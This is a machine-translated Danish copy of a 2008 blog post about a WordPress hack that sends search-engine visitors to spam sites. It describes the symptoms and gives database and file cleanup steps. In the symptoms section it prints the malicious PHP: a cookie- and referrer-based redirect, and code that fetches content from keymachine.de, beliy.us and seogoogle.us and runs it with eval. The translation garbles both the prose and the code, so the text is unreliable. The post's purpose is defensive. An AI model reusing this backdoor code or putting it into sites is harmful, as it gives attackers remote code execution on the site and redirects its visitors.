WordPress Banalisere: Genoprette og Lave Google og Ransage Maskine eller Ikke Koge Trafik Omadresseret hen til Jeres-Needs.info, AnyResults.Net, Gylden-Info.net og Anden Lovstridig Steder

Banalisere er igangv�rende al ud hen til banalisere og bedrift WordPress blogs kro p� alle leder og kanter den web, beplantning og indspr�jtning ondskabsfuld kode i WordPress koder og database for at omdirigere bes�gende og sl�r af Google og anden ransage maskine hen til spam steder s�som jeres-needs.info, anyresults.net, gylden-info.net, keymachine.de, beliy.us, seogoogle.us og mange anden spam steder at fyldte hos honorere- per- falde i hak CPC ads. Noget banalisere ser ud hen til indskyde st�rre samling af omadresserer al uden WordPress koge. Uden blevet banalisere, disse trafik antaget hen til ankomme til den blog nemlig bestemmelsessted.

Tegn i den Ransage Maskine Omadressering Banalisere

Kommentar at ikke al tegn m� ske overhovedet. Der m� v�re flere sig metode i banalisere eksisterede, hvilke bidrog hen til anderledes finder og eventuel dagsorden.

• Hvilken som helst falde i hak igennem af ransage maskine s�som Google, Yahoo, AOL, MSN, Vinduer Opholde sig ransage resultater, heri indbefattet blog ben�vne, vil v�re omadresseret og afsendte hen til banalisere’ steder s�som jeres-needs.info, anyresults.net, gylden-info.net, keymachine.de, beliy.us, seogoogle.us, hos den liste sikker hen til avle. Seer komme henne ved den banalisere side hos den samme ransage f�lge at han eller hun plejede ransage i ransage maskine.
• Falde i hak oven p� en samk�re hen til den blog oven p� RSS affodre l�ser s�som Google l�ser kan omadresseret hen til banalisere arbejdsplads ligeledes.
• EN bes�gende hos ikke beretning oven p� den blog, eller ikke login ( heraf g�r ikke har koge opdaget af ondskabsfuld kode), vil v�re omadresseret hen til spam steder.
• Bare ops�ge af ransage maskine er blevet omadresseret bortrejst, og den nummer opn� at holde for nar omkring sikkert mange bloggers, webmasters og arbejdsplads ejere, eller det vil sige ophold den opdagelse i den opgave.
• Pludselig v�ldig og opsigtsv�kkende henl�gge og miste i bastant bel�b i bes�gende trafik og side synspunkter i web bane statistik, navnlig trafik hos Google nemlig henvist, om s� ransage maskine resultater grad er i behold.
• Bastant henl�gge i annonceindt�gt af Google AdSense eller anden ads netv�rk, eller optage hverv.
• Den n�ste nedrig indkodet PHP kode m� se ud oven p� den wp-blog-header.php fil:

  <?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ nemlig $ref) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref((($[])$)!==falsk){ $ser1=”?;ophold; }
selv om && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”);udgang; }? >

• En billed, hvilke er ja endog en klase i ondskabsfuld PHP kode, var tilf�jede hen til den wp- indhold/ sendinger bibliotek. For eksempel, wp- indhold/ sendinger/2008/06/06/abcdefghijklmn.jpg, eller sig m� v�re i jeres sig omslag, i.e. wp-contents/themes/classic/images/xyz.jpg. Den ben�vne i den billed m� v�re i den format i xxxxxx_old.jpeg.
• En l�sning var indlagt i MySQL database nemlig WordPress wp_options hen til aktivere den billed ( den ondskabsfuld PHP kode) nemlig en stik, typisk nemlig rss_f541b3abd05e7962fcab37737f40fad8.
• Der m� v�re ligeledes ondskabsfuld koder, navnlig dem at tolket hos vurdere() eller base64_decode() befale blevet indlagt i anden WordPress PHP filer. Eksempler er den n�ste koder:

  ifisset_GET'p'(($[])) {
$sock = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($sock, ‘ blive http:/km20725.keymachine.de/ styreenhed/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($sock, ‘ v�rt: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($sock));
$tilfredshed = anr�be(”, $ tilfredshed);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($sock);}
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ styreenhed/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ styreenhed/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  evalgzinflatebase64_decode(((

• WordPress sig det vil sige blevet aktiveret og anvendte kan indspr�jtet hos banalisere kode og skabagtig ligeledes. S�dan kode normalt eksisterer i header.php eller index.php i den sig, og har en k� lig den nedenst�ende

  ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:

Den WordPress ransage trafik omdirigere hen til spam arbejdsplads banalisere sker sikkert p� grund af sikkerhed hel og vulnerability det vil sige ikke lappet hvor blog indehaver afg�rer ikke hen til opnormere hen til senest gengivelse i WordPress ( selv om nogetmeddeler at deres blogs blevet banalisere om s� dens’ allerede oven p� den senest gengivelse i WordPress 2.5.1). Hvilke den hidf�re, her ovre’ den lave og opklaring hen til l�se og besejre den banalisere hen til sikre sig at jer besidde igen den trafik og undg� blevet tr�kke ned af Google af urimelig omadresserer hen til spam sider.

1. Sikkerhedskopi den WordPress database.
2. Hj�lp phpMyAdmin hen til gennemse WordPress MySQL database tavler. Begive sig til wp_options bord, og s� er der ikke mere redigere den postyr ben�vnt active_plugins. Den postyr detaljer al handlekraftig stik at er blevet aktiveret. Efterkontrollere den liste ( i en k�), og kigge efter en en stik ben�vnt sluttede hos en billed forl�ngelse, s�som .jpg, .jpeg, .gif og og lignende. For eksempel, abcdefgh_old.jpeg. Optegne den bane hen til den billed fil.
3. Benytter sFTP eller SSH ( lade ligge omkring FTP eller Telnet nemlig sikkerhed), s� er der ikke mere navigere hen til den bane i den fil, og fjerne den fil.
4. Begive sig til WordPress Administrator Stik bed�mmelseskomite, deaktivere eller aktivere hvilken som helst stik hen til slette ned af den ondskabsfuld stik af den “active_plugins” postyr.
5. Igen hen til phpMyAdmin, henne ved den wp_options bord, hitte en postyr at indeholder den n�ste f�lge nemlig option_name:

   rss_f541b3abd05e7962fcab37737f40fad8

   Fjerne den postyr bortrejst.

   Selv om jer dont’ kende hvor hen til pr�stere den database oprydning indg�ende i foranstaltninger ovenfor, her ovre’ en video l�rer-:

6. Begive sig til wp_users bord. Selv om der er en navnl�s bruger ( v�rdil�s v�rdi i user_nicename ager) skabt henne ved 000000:: oven p� 0000-00-00, optegne den bruger ID (ID ager, et antal). Fjerne den bruger.
7. Gennemse den wp_usermeta bord. Lokalisere al r�kker hos bruger passer til den ID i den overstreget lovstridig bruger. Der er normalt tretal r�kker blevet forenet hen til den angribere bruger ID. Fjerne en hel forenet r�kker.
8. Login hen til den styreenhed hen til redigere den sig filer, eller gennemse den sig filer’ kode i Sig Editor i WordPress Administrator Designe bed�mmelseskomite. Indskrive den header.php og index.php nemlig hvilken som helst mist�nksom kode. Som tidligere n�vnt, kigge efter et eller andet lig den k� nedenst�ende:

   ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:

   Hvis De finder det, fjerne og oph�ve den kode. Kommentar at den ondskabsfuld kode vil v�re adskillige linier l�nge i hele.

9. Selv om dens’ ikke allerede eksisterede, skabe en indholdsl�s index.html fil i den wp- indhold/ stik bibliotek. Den blanktegn index.html gemmer den indhold i den stik bibliotek, effektive sk�rme hvad stik-ins blevet anvendte af banalisere hen til g�re h�rd og sk�rpe den WordPress sikkerhed.
10. Sende og skifte ud hver og al mulig WordPress filer ( ikke alene men ogs� wp-blog-header.php) oven p� den styreenhed hos den nylavet, ren, og selvst�ndigsenest gengivelse af WordPress (selvf�lgelig, bortset f� filer s�som wp-config.php og sig). Selv om jeres’ opgraderer, l�se denlede grundigt.
11. Lave om p� jeres password.
12. Selv om du har mangfoldig brugernes, lave om p� deres password ( eller opfordre sig hen til lave om p� den password) ligeledes.

betydelig: Indev�rende er en apparat oversat side hvilke findes " nemlig er" uden garanti. Apparat gengivelse m� v�re vanskeligt at forst�. Behage omtaleselvst�ndig Engelsk paragraf n�r som helst eventuel.

Lod og levere eller blive teknisk opbakning og hj�lp henne vedMig Digital Liv Forum.

Besl�gtet Artikler

• Sammenl�gge NoFollow Sl�gtskab hen til WordPress Blogroll hen til Forh�je PageRank
• WordPress Stik: Display Google Analytisk og FeedBurner Meddeler Statistik af Arbejdsplads Admin
• Technorati Indg�ende Golfbane Stik nemlig WordPress
• EN Se p� Google Merchant Ransage
• Hvor hen til Undg�, Omg� eller Slippe bort Google Sand
• SEO Kammeratlig Skrive om Metode hen til Skridt Website URL Af Subdir hen til Rod For�ldre Omslag
• Drive Flere Trafik af Benytter Billeder
• Ask.com Ransage Maskine Anmelde af CNNMoney
• Integrere og Display Google AdSense nemlig Ransage og Co-Op Skik og brug Ransage Maskine Resultater i WordPress Blog Side Skabelon
• StatTraq Wordpress Stik nemlig Arbejdsplads Statistisk og Trafik Im�deg�

Indev�rende l�sning var sendt oven p� Tirsdag, Juni 10th, 2008 henne ved 103: er og er gemt ind underWeblogs. Jer kunne komme efter hvilken som helst svar hen til indev�rende l�sning igennem denRSS 2.0 affodre Jer kunneafg� en svar,eller styrekugle af jeres besidde arbejdsplads.